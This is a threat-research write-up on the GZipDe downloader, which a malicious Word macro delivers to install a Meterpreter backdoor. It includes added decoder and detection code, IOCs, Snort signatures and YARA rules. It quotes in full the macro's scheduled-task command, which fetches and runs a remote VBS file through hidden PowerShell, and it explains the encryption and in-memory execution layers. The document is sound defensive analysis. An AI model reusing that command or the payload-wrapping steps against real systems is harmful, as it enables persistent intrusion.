At the end of May a Middle Eastern news network published an article about the next Shanghai Cooperation Organization Summit. A week ago, AlienVault Labs detected a new malicious document targeting the area. It uses a piece of text taken from the report as a decoy:
This is the first step of a multistage infection in which several servers and artifacts are involved. Although the final goal seems to be the installation of a Metasploit backdoor, we found an interesting .NET downloader which uses a custom encryption method to obfuscate process memory and evade antivirus detection.
Malicious Document
The file, which was uploaded to VirusTotal by a user in Afghanistan, is a Microsoft Word document (.doc) carrying macro malware. When opened, the macro runs a Visual Basic script stored as a hexadecimal stream, which registers a scheduled task that launches a hidden PowerShell console:
'C:\Windows\System32\schtasks.exe' /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR 'Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\'http://118.193.251[.]137/dropbox/?p=BT67HU78HZ\',\'$env:public\svchost325.vbs\');(New-Object -com Shell.Application).ShellExecute(\'$env:public\svchost325.vbs\');' /F
The PowerShell command issues an HTTP request to the following URL:
http://118.193.251[.]137/dropbox/?p=BT67HU78HZ
We are missing the next step of the infection chain as the server is now offline.
Based on the shared path, we believe the following file is related and may belong to a later stage of the infection: http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe.
GZipDe - The Encrypted Downloader
The internal name of this malware is Gzipde, as specified by the path it was built on the attacker’s machine:
Documents\Visual Studio 2008\Projects\gzipde\gzipde\obj\Debug\gzipde.pdb
We found the original reverse-tcp payload publicly available on GitHub, although the attacker added an extra encryption layer on top of that version. The payload is a Base64 string, named GZipDe, which is zip-compressed and encrypted with a custom symmetric-key scheme, most likely to avoid antivirus detection.
The key is described as an array of bytes, with the values:
After decompression, the data passes through a decryptor. The encryption method is RC4 with a 23-byte key.
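To make the layering concrete, the following Python snippet is an added analyst-side decoder (example code written for this write-up, not code from the original post or from the malware) that peels the blob in the order described: Base64 decode, decompress, then RC4-decrypt with a 23-byte key. The key bytes of the real sample are not reproduced here, so the key, the marker plaintext and the blob are all constructed stand-ins; the encode_gzipde helper exists only to build that sample.

```python
import base64
import gzip


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key scheduling followed by the keystream generator.
    RC4 is symmetric, so the same call both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def decode_gzipde(blob_b64: str, key: bytes) -> bytes:
    """Peel the layers in the order the write-up describes:
    Base64 text -> gzip stream -> RC4 ciphertext -> decrypted payload."""
    if len(key) != 23:
        raise ValueError("GZipDe uses a 23-byte RC4 key")
    compressed = base64.b64decode(blob_b64, validate=True)
    encrypted = gzip.decompress(compressed)
    return rc4(key, encrypted)


def encode_gzipde(payload: bytes, key: bytes) -> str:
    """Inverse pipeline (encrypt -> compress -> Base64). Used here only to
    build a constructed sample blob; it is not taken from the malware."""
    return base64.b64encode(gzip.compress(rc4(key, payload))).decode("ascii")


# Constructed stand-ins: the real sample's key bytes are shown as an image in
# the original post and are not reproduced here, and the plaintext is an
# inert marker string rather than shellcode.
SAMPLE_KEY = bytes(range(0x41, 0x41 + 23))  # 23 bytes, "ABC...W"
SAMPLE_PLAINTEXT = b"constructed marker payload for the decoder demo"
SAMPLE_BLOB = encode_gzipde(SAMPLE_PLAINTEXT, SAMPLE_KEY)


if __name__ == "__main__":
    print("blob:", SAMPLE_BLOB[:40], "...")
    print("recovered:", decode_gzipde(SAMPLE_BLOB, SAMPLE_KEY))
```

When working on a real sample, the key is read from the byte array embedded in the .NET binary and passed to decode_gzipde; because the RC4 layer sits beneath the compression layer, decompressing with the wrong key order yields garbage rather than an error, so the length check is the only early warning the decoder gives.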
The malware allocates a new memory page with execute, read and write permissions. It then copies the decrypted payload into it and launches a new thread to execute it.
The script uses the WaitForSingleObject C# class, meaning that the program accesses a mutex object. A special handler controls the process's access to system resources. This prevents multiple instances of the same malware from running at the same time, which would unnecessarily increase resource usage and produce more network noise.
The payload contains shellcode that contacts the server at 175.194.42[.]8. Although the server is currently down, Shodan recorded it serving a Metasploit payload:
Metasploit is becoming a popular choice with targeted attacks.
The Metasploit payload
The server, 175.194.42[.]8, delivers a Metasploit payload. It contains shellcode designed to evade system detection (it appears to carry a valid DOS header) and a Meterpreter payload, a capable backdoor. For example, it can gather information from the system and contact the command and control server to receive further commands.
This shellcode loads the entire DLL into memory, so it can operate without writing anything to disk. This technique is called Reflective DLL injection. From this point, the attacker can deliver any other payload in order to acquire elevated privileges and move within the local network.
Thanks to Chris Doman and Jaime Blasco for collaboration.
Appendix
File Hashes
IP Addresses
118.193.251[.]137
175.194.42[.]8
URLs
http://118.193.251[.]137/dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe
http://118.193.251[.]137/dropbox/?p=BT67HU78HZ
Network Detection
Multi-purpose:
AV ATTACK_RESPONSE Metasploit Reverse Shell Verification (Echo)
ET ATTACK_RESPONSE Metasploit/Meterpreter - Sending metsrv.dll to Compromised Host
ET ATTACK_RESPONSE Metasploit Meterpreter Reverse HTTPS certificate
Dedicated:
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware CnC Checkin"; flow:established,to_server; content:"/dropbox/?p="; http_uri; depth:12; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; pcre:"/^\/dropbox\/\?p=[a-zA-Z0-9]*$/U"; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN GZipDe MacroMalware Payload Request"; flow:established,to_server; content:"/dropbox/file"; depth:13; http_uri; content:".exe"; http_uri; distance:0; isdataat:!1,relative; content:!"User-Agent|3a| "; http_header; content:!"Referer"; http_header; reference:md5,951d9f3320da660593930d3425a9271b; classtype:trojan-activity; sid:xxx; rev:1;)
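To show what the two dedicated signatures above actually match, here is an added Python re-implementation of their logic run over constructed raw HTTP requests. It is example code written for this write-up, not part of the original post or of AlienVault's detection content; the Host values are placeholders and the URIs reuse the defanged paths listed in the appendix.

```python
import re
from typing import Dict, List, Optional, Tuple

# Mirrors the pcre of the check-in rule: the whole URI must be /dropbox/?p=<alnum>
CHECKIN_URI = re.compile(r"^/dropbox/\?p=[A-Za-z0-9]*$")


def parse_request(raw: str) -> Optional[Tuple[str, str, Dict[str, str]]]:
    """Split a raw HTTP/1.x request into (method, uri, lower-cased header map)."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    parts = lines[0].split()
    if len(parts) != 3:
        return None
    method, uri, _version = parts
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, uri, headers


def classify(raw: str) -> List[str]:
    """Return the names of the signatures a request would trigger."""
    parsed = parse_request(raw)
    if parsed is None:
        return []
    _method, uri, headers = parsed
    alerts: List[str] = []
    # Both rules are negated on User-Agent and Referer: the WebClient call in
    # the macro sends neither, which is what makes the traffic stand out.
    no_ua_no_referer = "user-agent" not in headers and "referer" not in headers
    if no_ua_no_referer and CHECKIN_URI.match(uri):
        alerts.append("AV TROJAN GZipDe MacroMalware CnC Checkin")
    # Second rule: URI starts with /dropbox/file and ends with .exe
    # (content ".exe" after the prefix, with isdataat:!1,relative = nothing follows).
    if no_ua_no_referer and uri.startswith("/dropbox/file") and uri.endswith(".exe"):
        alerts.append("AV TROJAN GZipDe MacroMalware Payload Request")
    return alerts


# Constructed requests; host is a documentation-range placeholder.
SAMPLE_CHECKIN = (
    "GET /dropbox/?p=BT67HU78HZ HTTP/1.1\r\n"
    "Host: 198.51.100.7\r\nConnection: Keep-Alive\r\n\r\n"
)
SAMPLE_PAYLOAD = (
    "GET /dropbox/filesfhjdfkjsjdkfjsdkfjsdfjksdfjsdkfasdfjnadsfjnasdnj/utorrent.exe HTTP/1.1\r\n"
    "Host: 198.51.100.7\r\n\r\n"
)
# Same URI but with a browser-style User-Agent: the negated content match fails.
SAMPLE_BROWSER = (
    "GET /dropbox/?p=BT67HU78HZ HTTP/1.1\r\n"
    "Host: 198.51.100.7\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
)
# Extra query parameter breaks the anchored pcre.
SAMPLE_OTHER = "GET /dropbox/?p=BT67HU78HZ&v=1 HTTP/1.1\r\nHost: 198.51.100.7\r\n\r\n"


if __name__ == "__main__":
    for name, req in [("checkin", SAMPLE_CHECKIN), ("payload", SAMPLE_PAYLOAD),
                      ("browser", SAMPLE_BROWSER), ("other", SAMPLE_OTHER)]:
        print(f"{name:8s} -> {classify(req)}")
```

The third sample is the caveat worth remembering: both signatures lean on the absence of User-Agent and Referer headers, so a downloader variant that sets a browser-like User-Agent would slip past them. Pair these network rules with the process-level correlation rules listed below rather than relying on either alone.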
Unified Security Management (USM) Correlation Rules
- System Compromise - Code Execution - Powershell Process Created by Office Word
- Delivery & Attack - Suspicious Download - File Download via Office Macro
- Environmental Awareness - Code Execution - Suspicious PowerShell Arguments
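The three correlation rules above map onto the schtasks command the macro runs: an Office process spawning a command-line tool, a scheduled task pointed at PowerShell, and a hidden PowerShell window that downloads and executes a file under the Public profile. The following added Python example (written for this write-up, not AlienVault's USM logic or code from the original post) evaluates constructed Sysmon-style process-creation events against those three conditions; the image paths and event shapes are assumptions.

```python
import re
from typing import Dict, List

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}
LOLBIN_CHILDREN = {"powershell.exe", "schtasks.exe", "wscript.exe", "cscript.exe"}

# Each indicator alone is common in admin scripts; two or more together is rare.
SUSPICIOUS_PS_ARGS = [
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window"),
    (re.compile(r"downloadfile|downloadstring", re.I), "WebClient download"),
    (re.compile(r"shellexecute|invoke-expression|\biex\b", re.I), "execution of fetched content"),
    (re.compile(r"\$env:public|\\users\\public\\", re.I), "drop into Public profile"),
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: Dict[str, str]) -> List[str]:
    """Return the findings a single process-creation event raises."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    findings: List[str] = []
    # Rule 1: code execution launched by an Office application
    if parent in OFFICE_PARENTS and image in LOLBIN_CHILDREN:
        findings.append(f"{image} spawned by Office application {parent}")
    # Rule 2: persistence via a scheduled task that runs PowerShell
    if image == "schtasks.exe" and re.search(r"/create\b", cmd, re.I) and re.search(r"powershell", cmd, re.I):
        findings.append("scheduled task created to run PowerShell")
    # Rule 3: suspicious PowerShell argument combination
    if "powershell" in cmd.lower():
        hits = [label for rx, label in SUSPICIOUS_PS_ARGS if rx.search(cmd)]
        if len(hits) >= 2:
            findings.append("suspicious PowerShell arguments: " + ", ".join(hits))
    return findings


# Constructed events. The first command line is the one quoted in the write-up
# (IP left defanged, as in the post); the other two are invented for contrast.
SAMPLE_EVENTS = [
    {
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\schtasks.exe",
        "CommandLine": r"""'C:\Windows\System32\schtasks.exe' /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR 'Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile(\'http://118.193.251[.]137/dropbox/?p=BT67HU78HZ\',\'$env:public\svchost325.vbs\');(New-Object -com Shell.Application).ShellExecute(\'$env:public\svchost325.vbs\');' /F""",
    },
    {
        # The task later fires under the Task Scheduler service, not Word.
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"""Powershell -W Hidden (New-Object System.Net.WebClient).DownloadFile('http://118.193.251[.]137/dropbox/?p=BT67HU78HZ','$env:public\svchost325.vbs');(New-Object -com Shell.Application).ShellExecute('$env:public\svchost325.vbs');""",
    },
    {
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell.exe -NoProfile Get-Service",
    },
]


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev["Image"]), "<-", basename(ev["ParentImage"]), evaluate(ev))
```

The second event shows why the parent-process rule alone is not enough: once the task fires, PowerShell is a child of the Task Scheduler service, so only the argument-based rule still catches it. The argument rule, in turn, needs the threshold of two indicators to keep hidden-window maintenance scripts from paging anyone.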
OTX Pulse
Yara Rule
import "dotnet"

rule gzipde_hunt
{
    meta:
        author = "AlienVault Labs"
        description = "Hunt rule to identify files related to Gzipde"
        copyright = "Alienvault Inc. 2018"
        reference = "https://otx.alienvault.com/pulse/5b239254174e5d5edab34e05"
    strings:
        $a = "118.193.251.137" nocase wide ascii
        $b = "BT67HU78HZ" nocase wide ascii
        $c = "2E0EB747-BE46-441A-A8B1-97AB27B49EC5" nocase wide ascii
        $d = "gzipde.pdb" nocase wide ascii
        // Backslashes must be escaped in YARA text strings
        $e = "C:\\Users\\jhon\\Documents\\Visual Studio 2008" nocase wide ascii
    condition:
        any of them
}

rule MeterpreterEncryptedPayloadDotNetGzipDE
{
    meta:
        type = "malware"
        description = "GZipDe"
        author = "jblasco@alienvault.com"
        reference1 = "https://github.com/DamonMohammadbagher/NativePayload_Reverse_tcp/blob/master/NativePayload_Reverse_tcp.cs"
        reference2 = "https://otx.alienvault.com/indicator/file/33c03d94f75698fac6a39a5a6c328c2be4a079717520e0ec411597b9ca3a9bef"
    strings:
        $pdb = "gzipde.pdb"
        $st1 = "PAGE_EXECUTE_READWRITE"
        $st2 = "EncryptInitalize"
        $st3 = "EncryptOutput"
        $st4 = "CreateThread"
        $st5 = "VirtualAlloc"
    condition:
        // MZ header, then either the assembly identity, the PDB path, or the
        // kernel32-only import profile together with all API/helper strings
        uint16(0) == 0x5A4D and
        (
            (dotnet.typelib == "c1181bc0-0102-44e9-82ba-7c1ca7d24219" and
             dotnet.guids[0] == "2e0eb747-be46-441a-a8b1-97ab27b49ec5") or
            $pdb or
            (dotnet.number_of_modulerefs == 1 and
             dotnet.modulerefs[0] == "kernel32" and
             all of ($st*))
        )
}